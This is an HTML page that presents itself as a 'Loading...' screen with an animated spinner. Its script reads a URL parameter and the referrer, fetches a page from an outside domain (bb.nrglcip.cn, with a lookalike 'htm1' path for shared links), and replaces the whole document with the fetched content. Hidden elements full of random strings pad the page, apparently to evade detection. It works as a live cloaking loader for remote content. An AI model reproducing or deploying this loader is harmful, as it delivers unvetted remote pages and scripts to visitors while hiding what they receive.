<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sc8yLECWOH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sc8yLECWOH .TLoeeOA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sc8yLECWOH .content {
            line-height: 50px;
            text-align: center
        }

        .sc8yLECWOH .img {
            width: 100%
        }

        .sc8yLECWOH .IPqf8ZbpX6B {
            text-align: center
        }

        .sc8yLECWOH .IPqf8ZbpX6B span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sc8yLECWOH .IPqf8ZbpX6B span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sc8yLECWOH .IPqf8ZbpX6B span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sc8yLECWOH .IPqf8ZbpX6B span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sc8yLECWOH .IPqf8ZbpX6B span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sc8yLECWOH .IPqf8ZbpX6B span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sc8yLECWOH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function D93OUtKoMFfQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var g1tm1 = D93OUtKoMFfQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ g1tm1 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ g1tm1 +".html?a=share";
		}
		
        Ycad9RP=url+"#"+new Date().getTime();
        Ycad9RP && function() {
            $.get(Ycad9RP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>I3Tjv4vRi9QVRLL9giZ6VdmIJyrLSm3qMNpAv8d</span>
<img  src='' style='display:none'>
<ul style='display:none' >yG5IhADlEH6WKmPfjOIxxPT9rTs8XTo2afknSiNCmsMxe4a1chxjvPhaL7gvifnMPXRoF1nJ4Ot2T</ul>
<h1 style='display:none' >cuBXeIH4UlsStJ71SGYxFoF</h1>
<div style='display:none'>lLDugbIFFrhM6Chdk9pdgQ8o</div>
<ul style='display:none' >yG5IhADlEH6WKmPfjOIxxPT9rTs8XTo2afknSiNCmsMxe4a1chxjvPhaL7gvifnMPXRoF1nJ4Ot2T</ul>
<p  style='display:none'>q1WKCKYlhSJ2iaJIpFBoghBLanJV</p><div class="sc8yLECWOH">
    <div class="TLoeeOA">
        <div class="IPqf8ZbpX6B">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >OFqlCJxQrY2LGAhQTRRHlUpdwQT9A4qjS</h1>
<img  src='' style='display:none'>
<p  style='display:none'>G8pSDiObMfkSBwOiNomZoUmFpmJ</p>
<img  src='' style='display:none'>
<li style='display:none' >YreRuZsx7Mj3uDG81jfyTToNPOesEfj</li>
<div style='display:none'>JBCXCl1OTZjbvYaVBVzTXVw2lhiWYFEAk8GOAdZrm</div>
<h1 style='display:none' >OFqlCJxQrY2LGAhQTRRHlUpdwQT9A4qjS</h1></body>
</html>